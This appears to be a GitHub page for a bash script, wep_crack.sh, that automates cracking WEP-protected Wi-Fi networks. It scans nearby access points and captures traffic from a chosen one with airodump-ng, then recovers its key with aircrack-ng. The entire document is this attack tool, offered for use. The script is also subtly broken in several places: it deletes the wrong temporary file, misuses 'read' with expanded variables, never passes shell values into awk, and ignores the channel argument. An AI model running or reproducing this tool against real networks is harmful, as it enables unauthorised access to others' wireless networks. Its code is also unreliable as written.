-
Notifications
You must be signed in to change notification settings - Fork 3
/
wep_crack.sh
executable file
·156 lines (128 loc) · 4.43 KB
/
wep_crack.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
TMP_AIRODUMP_FILE="airodump.tmp"
TMP_CAPTURE_FILE="wep_captured.cap"
TMP_CRACK_RESULT="crack_result.tmp"
header() {
clear
echo "========================================\n"
echo "WEP encrypted Wi-Fi Access Point Cracker\n"
echo "========================================\n"
}
cleanup() {
# Delete the temporary files from past runs (if they exist)
if [ -e $TMP_AIRODUMP_FILE ];
then
rm $TMP_AIRODUMP_FILE
fi
if [ -e $TMP_CAPTURE_FILE ];
then
rm $TMP_AIRODUMP_FILE
fi
}
select_options() {
echo "[!] Please select an option below to get started.\n\n"
echo "1) Scan access points nearby and crack"
echo "2) Crack access point with BSSID"
echo "3) Crack previously captured data (if any)"
echo "\nEnter your option: "
read user_option
find_wifi_interface
start_interface_in_monitor_mode $interface
if [[ "$user_option" = "1" ]];
then
header
echo "[+] Scanning nearby access points..."
# This makes the user select an access point and sets its BSSID in
# $required_bssid
scan_access_point $interface
capture_data $interface $access_point_bssid $access_point_channel
crack_access_point
elif [[ "$user_option" = "2" ]];
then
header
echo "[!] Enter BSSID of the access point:"
read $access_point_bssid
echo "[!] Enter channel of the access point:"
read $access_point_channel
capture_data $interface $access_point_bssid $access_point_channel
crack_access_point
elif [[ "$user_option" = "3" ]];
then
header
crack_access_point
fi
}
find_wifi_interface() {
echo "[+] Looking for interfaces.."
interface_count=`ifconfig | awk '/wlan.*/ {print $1}' | wc -w`
if [[ $interface_count -le 0 ]];
then
echo "[!] No interfaces found. Manually enter name of interface:"
read interface
elif [[ $interface_count -ge 2 ]];
then
echo "[!] Select an interface from:"
echo "`ifconfig | awk '/wlan.*/ {print \" \" $1}'`"
read interface
else
interface=`ifconfig | awk '/wlan.*/ {print $1}'`
echo "[+] Found interface $interface"
echo "[+] Proceeding with $interface..."
fi
}
start_interface_in_monitor_mode() {
# We pass the interface name as argument. $1 contains that interface name
airmon-ng start $1 >/dev/null
sleep 2
}
scan_access_point() {
echo "[+] Using $1 to scan for WEP-protected access points.."
echo "[+] Press ENTER to stop scan"
# Run the command in the background and redirect the outputs to both
# the terminal screen and a temporary file (name set in $TMP_AIRODUMP_FILE)
airodump-ng $1 | tee /dev/tty >> $TMP_AIRODUMP_FILE &
read $enter_key
# On hitting Enter key, kill the previous process
kill -9 "$!"
clear
# Extract the access point names from the temporary file we just created
access_points=`cat $TMP_AIRODUMP_FILE | awk '($8=="WEP") {print NR") "$11}'`
echo "[!] Select an access point:"
echo `$access_points`
# Let the user select an access point
read $access_point_number
# Extract access point name from the number the user entered in the last step
access_point_name=`echo $access_points | awk '($1==$access_point_number) {print $2}'`
access_point_details=`cat $TMP_AIRODUMP_FILE | awk '($11==$access_point_name) {print $1, $6}'`
# Extract the BSSID & channel of the access point
access_point_bssid=`echo $access_point_details | awk '{print $1}'`
access_point_channel=`echo $access_point_details | awk '{print $2}'`
}
capture_data() {
# Usage is airodump-ng <interface> -bssid <bssid> -c <channel> -w (filename)
echo "[+] Capturing data from access point. Let the 'Data' exceed 20000"
echo "[!] PRESS ENTER TO STOP CAPTURING.."
if [ -e $TMP_CAPTURE_FILE ];
then
echo "Removing old capture file $TMP_CAPTURE_FILE"
rm $TMP_CAPTURE_FILE
fi
airodump-ng $1 -bssid $2 -w $TMP_CAPTURE_FILE &
read $enter_key
kill -9 "$!"
}
crack_access_point() {
echo "Press ENTER to quit cracking.."
if [ -e $TMP_CAPTURE_FILE ];
then
aircrack-ng $TMP_CAPTURE_FILE &
read $enter_key
kill -9 "$!"
else
echo "No previously captured data file available"
header
select_options
fi
}
# Display header and options
header
select_options